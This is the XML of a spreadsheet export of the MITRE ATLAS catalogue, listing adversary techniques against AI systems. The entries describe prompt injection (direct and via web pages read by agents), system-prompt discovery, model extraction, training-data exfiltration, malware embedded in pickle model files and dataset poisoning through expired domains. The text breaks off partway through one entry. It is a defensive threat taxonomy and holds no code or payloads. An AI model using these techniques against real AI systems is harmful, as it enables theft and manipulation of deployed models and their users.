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2128" activeTab="4"/>
  </bookViews>
  <sheets>
    <sheet name="techniques" sheetId="1" r:id="rId1"/>
    <sheet name="tactics" sheetId="2" r:id="rId2"/>
    <sheet name="mitigations" sheetId="3" r:id="rId3"/>
    <sheet name="matrix" sheetId="4" r:id="rId4"/>
    <sheet name="techniques (ja)" sheetId="5" r:id="rId5"/>
    <sheet name="tactics (ja)" sheetId="6" r:id="rId6"/>
    <sheet name="mitigations (ja)" sheetId="7" r:id="rId7"/>
    <sheet name="matrix (ja)" sheetId="8" r:id="rId8"/>
  </sheets>
  <calcPr calcId="144525"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2403" uniqueCount="1117">
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>STIX ID</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>url</t>
  </si>
  <si>
    <t>created</t>
  </si>
  <si>
    <t>last modified</t>
  </si>
  <si>
    <t>tactics</t>
  </si>
  <si>
    <t>platforms</t>
  </si>
  <si>
    <t>AML.T0035</t>
  </si>
  <si>
    <t>attack-pattern--c7d79f0f-1c80-41d5-b6ef-3c1c53c34a06</t>
  </si>
  <si>
    <t>AI Artifact Collection</t>
  </si>
  <si>
    <t>Adversaries may collect AI artifacts for [Exfiltration](/tactics/AML.TA0010) or for use in [AI Attack Staging](/tactics/AML.TA0001).
AI artifacts include models and datasets as well as other telemetry data produced when interacting with a model.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0035</t>
  </si>
  <si>
    <t>22 April 2025</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>ATLAS</t>
  </si>
  <si>
    <t>AML.T0008.000</t>
  </si>
  <si>
    <t>attack-pattern--253d4b38-c3b2-4c21-9239-9193c0500316</t>
  </si>
  <si>
    <t>AI Development Workspaces</t>
  </si>
  <si>
    <t>Developing and staging AI attacks often requires expensive compute resources.
Adversaries may need access to one or many GPUs in order to develop an attack.
They may try to anonymously use free resources such as Google Colaboratory, or cloud resources such as AWS, Azure, or Google Cloud as an efficient way to stand up temporary resources to conduct operations.
Multiple workspaces may be used to avoid detection.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0008.000</t>
  </si>
  <si>
    <t>Resource Development</t>
  </si>
  <si>
    <t>AML.T0048.004</t>
  </si>
  <si>
    <t>attack-pattern--4bd0628d-3cdd-4411-9192-2af6c0f02287</t>
  </si>
  <si>
    <t>AI Intellectual Property Theft</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate AI artifacts to steal intellectual property and cause economic harm to the victim organization.
Proprietary training data is costly to collect and annotate and may be a target for [Exfiltration](/tactics/AML.TA0010) and theft.
AIaaS providers charge for use of their API.
An adversary who has stolen a model via [Exfiltration](/tactics/AML.TA0010) or via [Extract AI Model](/techniques/AML.T0024.002) now has unlimited use of that service without paying the owner of the intellectual property.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0048.004</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>AML.T0040</t>
  </si>
  <si>
    <t>attack-pattern--fd10d38b-4428-4701-aa6b-39bcf961ac6d</t>
  </si>
  <si>
    <t>AI Model Inference API Access</t>
  </si>
  <si>
    <t>Adversaries may gain access to a model via legitimate access to the inference API.
Inference API access can be a source of information to the adversary ([Discover AI Model Ontology](/techniques/AML.T0013), [Discover AI Model Family](/techniques/AML.T0014)), a means of staging the attack ([Verify Attack](/techniques/AML.T0042), [Craft Adversarial Data](/techniques/AML.T0043)), or for introducing data to the target system for Impact ([Evade AI Model](/techniques/AML.T0015), [Erode AI Model Integrity](/techniques/AML.T0031)).
Many systems rely on the same models provided via an inference API, which means they share the same vulnerabilities. This is especially true of foundation models which are prohibitively resource intensive to train. Adversaries may use their access to model APIs to identify vulnerabilities such as jailbreaks or hallucinations and then target applications that use the same models.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0040</t>
  </si>
  <si>
    <t>AI Model Access</t>
  </si>
  <si>
    <t>AML.T0010.001</t>
  </si>
  <si>
    <t>attack-pattern--cdf60b67-5511-42ba-b459-3aed5c3343f2</t>
  </si>
  <si>
    <t>AI Software</t>
  </si>
  <si>
    <t>Most AI systems rely on a limited set of AI frameworks.
An adversary could get access to a large number of AI systems through a comprise of one of their supply chains.
Many AI projects also rely on other open source implementations of various algorithms.
These can also be compromised in a targeted way to get access to specific systems.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0010.001</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>AML.T0010</t>
  </si>
  <si>
    <t>attack-pattern--911b49e8-556c-4ca9-9dad-39040ec216db</t>
  </si>
  <si>
    <t>AI Supply Chain Compromise</t>
  </si>
  <si>
    <t>Adversaries may gain initial access to a system by compromising the unique portions of the AI supply chain.
This could include [Hardware](/techniques/AML.T0010.000), [Data](/techniques/AML.T0010.002) and its annotations, parts of the AI [AI Software](/techniques/AML.T0010.001) stack, or the [Model](/techniques/AML.T0010.003) itself.
In some instances the attacker will need secondary access to fully carry out an attack using compromised components of the supply chain.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0010</t>
  </si>
  <si>
    <t>AML.T0047</t>
  </si>
  <si>
    <t>attack-pattern--eea9d0bf-847c-4120-bcfd-dc178b4c6649</t>
  </si>
  <si>
    <t>AI-Enabled Product or Service</t>
  </si>
  <si>
    <t>Adversaries may use a product or service that uses artificial intelligence under the hood to gain access to the underlying AI model.
This type of indirect model access may reveal details of the AI model or its inferences in logs or metadata.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0047</t>
  </si>
  <si>
    <t>AML.T0008</t>
  </si>
  <si>
    <t>attack-pattern--056e4ffe-e0da-46ec-8dee-628a2fecacd0</t>
  </si>
  <si>
    <t>Acquire Infrastructure</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent infrastructure for use throughout their operation.
A wide variety of infrastructure exists for hosting and orchestrating adversary operations.
Infrastructure solutions include physical or cloud servers, domains, mobile devices, and third-party web services.
Free resources may also be used, but they are typically limited.
Infrastructure can also include physical components such as countermeasures that degrade or disrupt AI components or sensors, including printed materials, wearables, or disguises.
Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation.
Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services.
Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0008</t>
  </si>
  <si>
    <t>AML.T0002</t>
  </si>
  <si>
    <t>attack-pattern--4eb73819-e06c-46b1-8fe0-692be6af794d</t>
  </si>
  <si>
    <t>Acquire Public AI Artifacts</t>
  </si>
  <si>
    <t>Adversaries may search public sources, including cloud storage, public-facing services, and software or data repositories, to identify AI artifacts.
These AI artifacts may include the software stack used to train and deploy models, training and testing data, model configurations and parameters.
An adversary will be particularly interested in artifacts hosted by or associated with the victim organization as they may represent what that organization uses in a production environment.
Adversaries may identify artifact repositories via other resources associated with the victim organization (e.g. [Search Victim-Owned Websites](/techniques/AML.T0003) or [Search Open Technical Databases](/techniques/AML.T0000)).
These AI artifacts often provide adversaries with details of the AI task and approach.
AI artifacts can aid in an adversary's ability to [Create Proxy AI Model](/techniques/AML.T0005).
If these artifacts include pieces of the actual model in production, they can be used to directly [Craft Adversarial Data](/techniques/AML.T0043).
Acquiring some artifacts requires registration (providing user details such email/name), AWS keys, or written requests, and may require the adversary to [Establish Accounts](/techniques/AML.T0021).
Artifacts might be hosted on victim-controlled infrastructure, providing the victim with some information on who has accessed that data.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0002</t>
  </si>
  <si>
    <t>AML.T0006</t>
  </si>
  <si>
    <t>attack-pattern--c3a26e3e-3220-422c-b4b4-3913820fe6cf</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may probe or scan the victim system to gather information for targeting.
This is distinct from other reconnaissance techniques that do not involve direct interaction with the victim system.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0006</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>AML.T0016.000</t>
  </si>
  <si>
    <t>attack-pattern--a1c0328f-7d6b-431f-85a9-59d0bc15786d</t>
  </si>
  <si>
    <t>Adversarial AI Attack Implementations</t>
  </si>
  <si>
    <t>Adversaries may search for existing open source implementations of AI attacks. The research community often publishes their code for reproducibility and to further future research. Libraries intended for research purposes, such as CleverHans, the Adversarial Robustness Toolbox, and FoolBox, can be weaponized by an adversary. Adversaries may also obtain and use tools that were not originally designed for adversarial AI attacks as part of their attack.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0016.000</t>
  </si>
  <si>
    <t>AML.T0017.000</t>
  </si>
  <si>
    <t>attack-pattern--c63cb2b7-ad6f-4790-811d-5eca14caaec8</t>
  </si>
  <si>
    <t>Adversarial AI Attacks</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may develop their own adversarial attacks.
They may leverage existing libraries as a starting point ([Adversarial AI Attack Implementations](/techniques/AML.T0016.000)).
They may implement ideas described in public research papers or develop custom made attacks for the victim model.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0017.000</t>
  </si>
  <si>
    <t>AML.T0043.001</t>
  </si>
  <si>
    <t>attack-pattern--056578e2-7e26-496a-9dcd-0c1d05084da7</t>
  </si>
  <si>
    <t>Black-Box Optimization</t>
  </si>
  <si>
    <t xml:space="preserve">In Black-Box attacks, the adversary has black-box (i.e. [AI Model Inference API Access](/techniques/AML.T0040) via API access) access to the target model.
With black-box attacks, the adversary may be using an API that the victim is monitoring.
These attacks are generally less effective and require more inferences than [White-Box Optimization](/techniques/AML.T0043.000) attacks, but they require much less access.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0043.001</t>
  </si>
  <si>
    <t>AI Attack Staging</t>
  </si>
  <si>
    <t>AML.T0043.002</t>
  </si>
  <si>
    <t>attack-pattern--6001061b-5b84-4d5b-af1a-5a822c214184</t>
  </si>
  <si>
    <t>Black-Box Transfer</t>
  </si>
  <si>
    <t xml:space="preserve">In Black-Box Transfer attacks, the adversary uses one or more proxy models (trained via [Create Proxy AI Model](/techniques/AML.T0005) or [Train Proxy via Replication](/techniques/AML.T0005.001)) they have full access to and are representative of the target model.
The adversary uses [White-Box Optimization](/techniques/AML.T0043.000) on the proxy models to generate adversarial examples.
If the set of proxy models are close enough to the target model, the adversarial example should generalize from one to another.
This means that an attack that works for the proxy models will likely then work for the target model.
If the adversary has [AI Model Inference API Access](/techniques/AML.T0040), they may use [Verify Attack](/techniques/AML.T0042) to confirm the attack is working and incorporate that information into their training process.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0043.002</t>
  </si>
  <si>
    <t>AML.T0067.000</t>
  </si>
  <si>
    <t>attack-pattern--dbe22826-20b1-4dc5-897b-fdcf89ef3ee3</t>
  </si>
  <si>
    <t>Citations</t>
  </si>
  <si>
    <t>Adversaries may manipulate the citations provided in an AI system's response, in order to make it appear trustworthy. Variants include citing a providing the wrong citation, making up a new citation, or providing the right citation but for adversary-provided data.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0067.000</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>AML.T0075</t>
  </si>
  <si>
    <t>attack-pattern--a9da00c7-7328-4a16-afce-04d0cd4f7290</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</si>
  <si>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</si>
  <si>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Entra ID,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Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.[1][2]
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.[3][4]
Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through Disable or Modify Tools or Disable or Modify Cloud Logs.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0075</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>AML.T0050</t>
  </si>
  <si>
    <t>attack-pattern--eda10125-6f7d-479f-857a-19ef5d86a961</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter</t>
  </si>
  <si>
    <t xml:space="preserve">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 while Windows installations include the Windows Command Shell and PowerShell.
There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.
Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0050</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>AML.T0008.001</t>
  </si>
  <si>
    <t>attack-pattern--7afa4546-4cc9-4495-acb7-41b61ffb7650</t>
  </si>
  <si>
    <t>Consumer Hardware</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may acquire consumer hardware to conduct their attacks.
Owning the hardware provides the adversary with complete control of the environment. These devices can be hard to trace.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0008.001</t>
  </si>
  <si>
    <t>AML.T0010.004</t>
  </si>
  <si>
    <t>attack-pattern--c1ddecc2-a64a-4cd3-a3cb-cd295b829229</t>
  </si>
  <si>
    <t>Container Registry</t>
  </si>
  <si>
    <t>An adversary may compromise a victim's container registry by pushing a manipulated container image and overwriting an existing container name and/or tag. Users of the container registry as well as automated CI/CD pipelines may pull the adversary's container image, compromising their AI Supply Chain. This can affect development and deployment environments.
Container images may include AI models, so the compromised image could have an AI model which was manipulated by the adversary (See [Manipulate AI Model](/techniques/AML.T0018)).</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0010.004</t>
  </si>
  <si>
    <t>AML.T0076</t>
  </si>
  <si>
    <t>attack-pattern--c5e79835-2002-4513-8de3-edaa7c3c1a3c</t>
  </si>
  <si>
    <t>Corrupt AI Model</t>
  </si>
  <si>
    <t>An adversary may purposefully corrupt a malicious AI model file so that it cannot be successfully deserialized in order to evade detection by a model scanner. The corrupt model may still successfully execute malicious code before deserialization fails.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0076</t>
  </si>
  <si>
    <t>AML.T0034</t>
  </si>
  <si>
    <t>attack-pattern--70660fc0-a4ba-4500-ac74-557fed97b06b</t>
  </si>
  <si>
    <t>Cost Harvesting</t>
  </si>
  <si>
    <t>Adversaries may target different AI services to send useless queries or computationally expensive inputs to increase the cost of running services at the victim organization.
Sponge examples are a particular type of adversarial data designed to maximize energy consumption and thus operating cost.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0034</t>
  </si>
  <si>
    <t>AML.T0043</t>
  </si>
  <si>
    <t>attack-pattern--f95077b3-b1e0-4f4f-9baf-c0bd2f25416c</t>
  </si>
  <si>
    <t>Craft Adversarial Data</t>
  </si>
  <si>
    <t>Adversarial data are inputs to an AI model that have been modified such that they cause the adversary's desired effect in the target model.
Effects can range from misclassification, to missed detections, to maximizing energy consumption.
Typically, the modification is constrained in magnitude or location so that a human still perceives the data as if it were unmodified, but human perceptibility may not always be a concern depending on the adversary's intended effect.
For example, an adversarial input for an image classification task is an image the AI model would misclassify, but a human would still recognize as containing the correct class.
Depending on the adversary's knowledge of and access to the target model, the adversary may use different classes of algorithms to develop the adversarial example such as [White-Box Optimization](/techniques/AML.T0043.000), [Black-Box Optimization](/techniques/AML.T0043.001), [Black-Box Transfer](/techniques/AML.T0043.002), or [Manual Modification](/techniques/AML.T0043.003).
The adversary may [Verify Attack](/techniques/AML.T0042) their approach works if they have white-box or inference API access to the model.
This allows the adversary to gain confidence their attack is effective "live" environment where their attack may be noticed.
They can then use the attack at a later time to accomplish their goals.
An adversary may optimize adversarial examples for [Evade AI Model](/techniques/AML.T0015), or to [Erode AI Model Integrity](/techniques/AML.T0031).</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0043</t>
  </si>
  <si>
    <t>AML.T0005</t>
  </si>
  <si>
    <t>attack-pattern--248bc7a1-0df9-41fc-aeb9-e267dc0577a9</t>
  </si>
  <si>
    <t>Create Proxy AI Model</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obtain models to serve as proxies for the target model in use at the victim organization.
Proxy models are used to simulate complete access to the target model in a fully offline manner.
Adversaries may train models from representative datasets, attempt to replicate models from victim inference APIs, or use available pre-trained models.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0005</t>
  </si>
  <si>
    <t>AML.T0010.002</t>
  </si>
  <si>
    <t>attack-pattern--ed8d9393-d6b3-4df8-8a27-c9d97f64cbf5</t>
  </si>
  <si>
    <t>Data</t>
  </si>
  <si>
    <t>Data is a key vector of supply chain compromise for adversaries.
Every AI project will require some form of data.
Many rely on large open source datasets that are publicly available.
An adversary could rely on compromising these sources of data.
The malicious data could be a result of [Poison Training Data](/techniques/AML.T0020) or include traditional malware.
An adversary can also target private datasets in the labeling phase.
The creation of private datasets will often require the hiring of outside labeling services.
An adversary can poison a dataset by modifying the labels being generated by the labeling service.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0010.002</t>
  </si>
  <si>
    <t>AML.T0036</t>
  </si>
  <si>
    <t>attack-pattern--39d12ad5-28b3-4322-953e-d17ae74159cc</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t xml:space="preserve">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Information stored in a repository may vary based on the specific instance or environment.
Specific common information repositories include SharePoint, Confluence, and enterprise databases such as SQL Server.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0036</t>
  </si>
  <si>
    <t>AML.T0037</t>
  </si>
  <si>
    <t>attack-pattern--b432a102-8ef6-4f76-8287-7d99c4bd5e39</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
This can include basic fingerprinting information and sensitive data such as ssh keys.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0037</t>
  </si>
  <si>
    <t>AML.T0002.000</t>
  </si>
  <si>
    <t>attack-pattern--c05491e8-0c47-490d-8df3-26f7d4fdc629</t>
  </si>
  <si>
    <t>Datasets</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may collect public datasets to use in their operations.
Datasets used by the victim organization or datasets that are representative of the data used by the victim organization may be valuable to adversaries.
Datasets can be stored in cloud storage, or on victim-owned websites.
Some datasets require the adversary to [Establish Accounts](/techniques/AML.T0021) for access.
Acquired datasets help the adversary advance their operations, stage attacks,  and tailor attacks to the victim organization.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0002.000</t>
  </si>
  <si>
    <t>AML.T0029</t>
  </si>
  <si>
    <t>attack-pattern--1038acd6-a2d0-4fb5-93e8-e1702964182d</t>
  </si>
  <si>
    <t>Denial of AI Service</t>
  </si>
  <si>
    <t>Adversaries may target AI-enabled systems with a flood of requests for the purpose of degrading or shutting down the service.
Since many AI systems require significant amounts of specialized compute, they are often expensive bottlenecks that can become overloaded.
Adversaries can intentionally craft inputs that require heavy amounts of useless compute from the AI system.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0029</t>
  </si>
  <si>
    <t>AML.T0017</t>
  </si>
  <si>
    <t>attack-pattern--bd5c8094-54c8-45f6-82de-4ce8349fcd4a</t>
  </si>
  <si>
    <t>Develop Capabilities</t>
  </si>
  <si>
    <t>Adversaries may develop their own capabilities to support operations. This process encompasses identifying requirements, building solutions, and deploying capabilities. Capabilities used to support attacks on AI-enabled systems are not necessarily AI-based themselves. Examples include setting up websites with adversarial information or creating Jupyter notebooks with obfuscated exfiltration code.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0017</t>
  </si>
  <si>
    <t>AML.T0051.000</t>
  </si>
  <si>
    <t>attack-pattern--2096e516-cb52-4131-a73d-0ef139258e4c</t>
  </si>
  <si>
    <t>Direct</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may inject prompts directly as a user of the LLM. This type of injection may be used by the adversary to gain a foothold in the system or to misuse the LLM itself, as for example to generate harmful content.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0051.000</t>
  </si>
  <si>
    <t>AML.T0007</t>
  </si>
  <si>
    <t>attack-pattern--726a5898-ac81-4c62-b828-9f105556a907</t>
  </si>
  <si>
    <t>Discover AI Artifacts</t>
  </si>
  <si>
    <t>Adversaries may search private sources to identify AI learning artifacts that exist on the system and gather information about them.
These artifacts can include the software stack used to train and deploy models, training and testing data management systems, container registries, software repositories, and model zoos.
This information can be used to identify targets for further collection, exfiltration, or disruption, and to tailor and improve attacks.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0007</t>
  </si>
  <si>
    <t>AML.T0014</t>
  </si>
  <si>
    <t>attack-pattern--9923b6b4-84f1-4ab4-8ccf-4d597db61a57</t>
  </si>
  <si>
    <t>Discover AI Model Family</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may discover the general family of model.
General information about the model may be revealed in documentation, or the adversary may use carefully constructed examples and analyze the model's responses to categorize it.
Knowledge of the model family can help the adversary identify means of attacking the model and help tailor the attack.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0014</t>
  </si>
  <si>
    <t>AML.T0013</t>
  </si>
  <si>
    <t>attack-pattern--adf16819-dc11-46a7-b23a-0ea57ccc093c</t>
  </si>
  <si>
    <t>Discover AI Model Ontology</t>
  </si>
  <si>
    <t>Adversaries may discover the ontology of an AI model's output space, for example, the types of objects a model can detect.
The adversary may discovery the ontology by repeated queries to the model, forcing it to enumerate its output space.
Or the ontology may be discovered in a configuration file or in documentation about the model.
The model ontology helps the adversary understand how the model is being used by the victim.
It is useful to the adversary in creating targeted attacks.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0013</t>
  </si>
  <si>
    <t>AML.T0063</t>
  </si>
  <si>
    <t>attack-pattern--dd1eaf06-1454-407d-b988-fab91c43c4f7</t>
  </si>
  <si>
    <t>Discover AI Model Outputs</t>
  </si>
  <si>
    <t>Adversaries may discover model outputs, such as class scores, whose presence is not required for the system to function and are not intended for use by the end user. Model outputs may be found in logs or may be included in API responses.
Model outputs may enable the adversary to identify weaknesses in the model and develop attacks.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0063</t>
  </si>
  <si>
    <t>AML.T0062</t>
  </si>
  <si>
    <t>attack-pattern--526f7326-7de2-43d1-96ea-ae85b7cde54e</t>
  </si>
  <si>
    <t>Discover LLM Hallucinations</t>
  </si>
  <si>
    <t>Adversaries may prompt large language models and identify hallucinated entities.
They may request software packages, commands, URLs, organization names, or e-mail addresses, and identify hallucinations with no connected real-world source. Discovered hallucinations provide the adversary with potential targets to [Publish Hallucinated Entities](/techniques/AML.T0060). Different LLMs have been shown to produce the same hallucinations, so the hallucinations exploited by an adversary may affect users of other LLMs.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0062</t>
  </si>
  <si>
    <t>AML.T0069</t>
  </si>
  <si>
    <t>attack-pattern--251922b0-0e89-485b-9d7b-a292232c00d7</t>
  </si>
  <si>
    <t>Discover LLM System Information</t>
  </si>
  <si>
    <t>The adversary is trying to discover something about the large language model's (LLM) system information. This may be found in a configuration file containing the system instructions or extracted via interactions with the LLM. The desired information may include the full system prompt, special characters that have significance to the LLM or keywords indicating functionality available to the LLM. Information about how the LLM is instructed can be used by the adversary to understand the system's capabilities and to aid them in crafting malicious prompts.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0069</t>
  </si>
  <si>
    <t>AML.T0008.002</t>
  </si>
  <si>
    <t>attack-pattern--813ac9e1-b1b4-464b-8acf-ef10ac84c11e</t>
  </si>
  <si>
    <t>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</si>
  <si>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(see [ATT&amp;CK](https://attack.mitre.org/techniques/T1583/001/)). Large AI datasets are often distributed as a list of URLs to individual datapoints. Adversaries may acquire expired domains that are included in these datasets and replace individual datapoints with poisoned examples ([Publish Poisoned Datasets](/techniques/AML.T0019)).</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0008.002</t>
  </si>
  <si>
    <t>AML.T0078</t>
  </si>
  <si>
    <t>attack-pattern--4e2eac6a-fa8c-4bf8-967e-fdc3638c0cf9</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>Adversaries may gain access to an AI system through a user visiting a website over the normal course of browsing, or an AI agent retrieving information from the web on behalf of a user. Websites can contain an [LLM Prompt Injection](/techniques/AML.T0051) which, when executed, can change the behavior of the AI model.
The same approach may be used to deliver other types of malicious code that don't target AI directly (see [Drive-by Compromise in ATT&amp;CK](https://attack.mitre.org/techniques/T1189/)).</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0078</t>
  </si>
  <si>
    <t>AML.T0018.002</t>
  </si>
  <si>
    <t>attack-pattern--b0b3327f-a064-4943-82b2-951fba172c6e</t>
  </si>
  <si>
    <t>Embed Malware</t>
  </si>
  <si>
    <t>Adversaries may embed malicious code into AI Model files.
AI models may be packaged as a combination of instructions and weights.
Some formats such as pickle files are unsafe to deserialize because they can contain unsafe calls such as exec.
Models with embedded malware may still operate as expected.
It may allow them to achieve Execution, Command &amp; Control, or Exfiltrate Data.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0018.002</t>
  </si>
  <si>
    <t>AML.T0031</t>
  </si>
  <si>
    <t>attack-pattern--0691cb6f-ab52-4219-bb75-88c7ef77f02e</t>
  </si>
  <si>
    <t>Erode AI Model Integrity</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may degrade the target model's performance with adversarial data inputs to erode confidence in the system over time.
This can lead to the victim organization wasting time and money both attempting to fix the system and performing the tasks it was meant to automate by hand.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0031</t>
  </si>
  <si>
    <t>AML.T0059</t>
  </si>
  <si>
    <t>attack-pattern--bf1b4fb5-5f17-42d1-ab74-b2b67f485f29</t>
  </si>
  <si>
    <t>Erode Dataset Integrity</t>
  </si>
  <si>
    <t>Adversaries may poison or manipulate portions of a dataset to reduce its usefulness, reduce trust, and cause users to waste resources correcting errors.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0059</t>
  </si>
  <si>
    <t>AML.T0021</t>
  </si>
  <si>
    <t>attack-pattern--59ab5025-ad52-4e07-8c5a-e47be578cee5</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create accounts with various services for use in targeting, to gain access to resources needed in [AI Attack Staging](/tactics/AML.TA0001), or for victim impersonation.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0021</t>
  </si>
  <si>
    <t>AML.T0015</t>
  </si>
  <si>
    <t>attack-pattern--6e6da90a-2d48-40cf-b27d-614360d96a1e</t>
  </si>
  <si>
    <t>Evade AI Model</t>
  </si>
  <si>
    <t>Adversaries can [Craft Adversarial Data](/techniques/AML.T0043) that prevent a AI model from correctly identifying the contents of the data.
This technique can be used to evade a downstream task where AI is utilized.
The adversary may evade AI based virus/malware detection, or network scanning towards the goal of a traditional cyber attack.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0015</t>
  </si>
  <si>
    <t>Defense Evasion, Impact, Initial Access</t>
  </si>
  <si>
    <t>AML.T0024</t>
  </si>
  <si>
    <t>attack-pattern--c606cfab-fa3d-4608-b01e-5f20ba14be1b</t>
  </si>
  <si>
    <t>Exfiltration via AI Inference API</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate private information via [AI Model Inference API Access](/techniques/AML.T0040).
AI Models have been shown leak private information about their training data (e.g.  [Infer Training Data Membership](/techniques/AML.T0024.000), [Invert AI Model](/techniques/AML.T0024.001)).
The model itself may also be extracted ([Extract AI Model](/techniques/AML.T0024.002)) for the purposes of [AI Intellectual Property Theft](/techniques/AML.T0048.004).
Exfiltration of information relating to private training data raises privacy concerns.
Private training data may include personally identifiable information, or other protected data.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0024</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>AML.T0025</t>
  </si>
  <si>
    <t>attack-pattern--e5f71e81-5f3e-4a82-8e99-d911d3e912f9</t>
  </si>
  <si>
    <t>Exfiltration via Cyber Means</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate AI artifacts or other information relevant to their goals via traditional cyber means.
See the ATT&amp;CK [Exfiltration](https://attack.mitre.org/tactics/TA0010/) tactic for more information.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0025</t>
  </si>
  <si>
    <t>AML.T0049</t>
  </si>
  <si>
    <t>attack-pattern--dffdbcc7-6db6-45aa-bd7e-f3fb62781b1b</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
